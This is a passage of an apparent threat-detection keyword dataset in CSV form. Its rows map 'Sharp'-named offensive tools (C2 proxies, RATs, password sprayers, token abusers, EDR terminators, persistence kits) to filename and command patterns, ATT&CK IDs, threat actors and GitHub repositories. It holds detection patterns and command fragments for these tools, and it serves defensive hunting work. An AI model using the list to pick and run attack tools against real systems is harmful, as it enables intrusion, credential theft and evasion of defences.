T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocks.sln*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksCommon*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z 
-*SharpSocksConfig*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksImplant*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSocksServer*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*SharpSpawner.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpSphere.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSploit*,offensive_tool_keyword,SharpSploit,SharpSploitis a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.,T1055 - T1059 - T1027 - T1505,TA0002 - TA0003 - TA0008 - TA0040,N/A,N/A,Exploitation tools,https://github.com/cobbr/SharpSploit,1,1,N/A,N/A,10,1632,321,2021-08-12T18:23:15Z,2018-09-20T14:22:37Z -*SharpSploit.dll*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*SharpSploitConsole_x*,offensive_tool_keyword,cobaltstrike,SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/anthemtotheego/SharpCradle,1,1,N/A,10,10,275,59,2020-12-30T17:15:51Z,2018-10-23T06:21:53Z -*SharpSploitDomainRecon*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpSploitDomainReconImpl*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpSplunkWhisperer2*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z 
-*SharpSpoolTrigger.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpSpray*,offensive_tool_keyword,SharpSpray,This project is a C# port of my PowerSpray.ps1 script. SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.,T1110 - T1558,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/jnqpblc/SharpSpray,1,1,N/A,N/A,2,176,36,2019-06-30T03:10:52Z,2019-03-04T17:14:07Z -*SharpSpray.exe *,offensive_tool_keyword,SharpDomainSpray,Basic password spraying tool for internal tests and red teaming,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/HunnicCyber/SharpDomainSpray,1,0,N/A,10,1,91,18,2020-03-21T09:17:48Z,2019-06-05T10:47:05Z -*SharpSpray.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSQLPwn*,offensive_tool_keyword,SharpSQLPwn,C# tool to identify and exploit weaknesses within MSSQL instances in Active Directory environments,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/lefayjey/SharpSQLPwn,1,1,N/A,N/A,1,74,15,2022-02-13T19:15:36Z,2022-01-20T19:58:07Z -*SharpSQLPwn.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpStay.csproj*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*Sharpstay.exe *,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*SharpStay.exe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,1,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*SharpStay.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpStay.sln*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*SharpStay-master*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,1,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*Sharp-Suite.git*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*SharpSvc.exe*,offensive_tool_keyword,sharpcollection,Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpSword.csproj*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword.exe*,offensive_tool_keyword,cobaltstrike,Read the contents of DOCX files using Cobalt Strike's Execute-Assembly,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,10,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword.exe*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword.sln*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSword-main.*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,1,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*SharpSystemTriggers.git*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpSystemTriggers.sln*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpSystemTriggers-main*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege 
Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*SharpTask.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*sharptelnet *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*SharpTemplateResources/cmd/*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1099,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*SharpTerminator.exe*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpTerminator.git*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z 
-*SharpTerminator.sln*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpTerminator-main.zip*,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*SharpToken* add_user*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* delete_user*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* enableUser *,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* list_token*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken* tscon *,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,0,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken.csproj*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken.exe*,offensive_tool_keyword,godpotato,GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.,T1055.012 - T1053.005 - T1047,TA0005 - TA0002 - TA0008,N/A,N/A,Privilege Escalation,https://github.com/BeichenDream/GodPotato,1,1,N/A,N/A,10,1186,179,2023-06-25T05:20:26Z,2022-12-23T14:37:00Z -*SharpToken.exe*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. 
It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken.git*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpToken-main.zip*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*SharpUnhooker.*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*SharpUnhooker-main*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*SharpUp audit*,offensive_tool_keyword,covenant,Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z 
-*SharpUp*,offensive_tool_keyword,SharpUp,SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.,T1057 - T1086 - T1059 - T1068,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/GhostPack/SharpUp,1,1,N/A,N/A,10,1021,222,2022-08-21T22:26:04Z,2018-07-24T17:39:33Z -*SharpUp.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*SharpUpManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*SharpUpMenu(*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in 